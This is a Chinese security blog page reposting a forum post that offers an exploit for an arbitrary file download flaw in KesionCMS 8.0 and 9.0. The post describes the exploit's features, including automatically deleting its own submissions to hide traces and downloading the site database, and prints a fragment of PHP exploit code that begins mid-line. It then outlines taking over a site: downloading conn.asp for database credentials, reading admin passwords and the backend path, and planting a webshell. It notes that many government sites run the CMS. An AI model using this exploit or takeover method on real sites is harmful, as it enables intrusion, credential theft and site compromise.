我喜欢黑夜,喜欢网络安全,孤独寂寞的黑夜里,我只需要,一包烟,一台笔记本...
更多
首  页>>网络攻防>> 漏洞信息科讯kesionCMS >=8.0 9.0 任意下载漏洞最新Exp
科讯kesionCMS >=8.0 9.0 任意下载漏洞最新Exp
16023
0推荐
0评论

科讯 kesionCMS >=8.0 9.0 任意下载漏洞最新 Exp

关于此漏洞已经在论坛发了2次了。。每次都exp都没搞完全。今天下午抽空就把exp搞完全了。绝对没BUG了。。亲测N个站点 没问题。

漏洞利用条件:

1.kesionCMS 版本 大于等于8.0

2.存在用户管理平台

测试图:

科讯 kesionCMS >=8.0 9.0 任意下载漏洞最新 Exp

科讯 kesionCMS >=8.0 9.0 任意下载漏洞最新 Exp


这次主要更新几点:

1.对8.x 9.x 都做了自行判断

2.发布投稿后会程序自动删除发布的投稿

3.增加数据库下载方式  set xiaku 1 设置即可!

4.代码整理!!

基本上就可以利用了。下面付上exploit for wve

 ".G('host'),1); //  
   
if(G('classid')=='自动获取') 
{ 
   
$data=HTTP::GET(G('host'),G('path').'plus/rss.asp','',''); 
   
if(strpos($data,'?classid=')!== false) 
{ 
preg_match('/classid=(.+?)&/', $data, $arr); 
   
//$result=explode("=",$arr[1]); 
$this->tjwj4($arr[1]); 
} 
else
{ 
msg('Get classid fail',1); 
} 
   
} 
else
{ 
$this->tjwj4(G('classid')); 
} 
   
} 
   
   
   
} 
   
?>--------------------------------------

测试拿webshell方法:下载conn.asp配置文件 查看access数据库路径(下载)或者是mssql数据的帐户密码(连接) 查看管理表_管理帐户密码,log表有后台路径等信息,进后台拿webshell就成!!

此exp只能用于漏洞检测,请不要非法利用。由于kesioncms涉及很多政府网站,请勿非法利用 传播等。一切后果自负!!

转自:https://forum.90sec.org/thread-3931-1-1.html




已经有 ( 0 ) 位网友对此发表了自己的看法,你也评一评吧! 此文不错,我要推荐-->    推 荐
欢迎参与讨论,请在这里发表您的看法、交流您的观点@禁止各种脚本

  • 点击Top
  • 推荐Top
  • 评论Top
更 多>>
本站采用Java语言开发,Spring框架,欢迎朋友们提意见。重新对页面进行布局,修改了程序,方便开源使用,由于本人美工真的不行 ,很少用背景图片,页面基本都用背景色...
主题:无色无味 | 网站地图|
Copyright (c) 2012-2013 www.shack2.org All Rights Reserved. | 空ICP备111111111号 | 程序设计: shack2 Powered by SJBlog v1.0 联系QQ:1341413415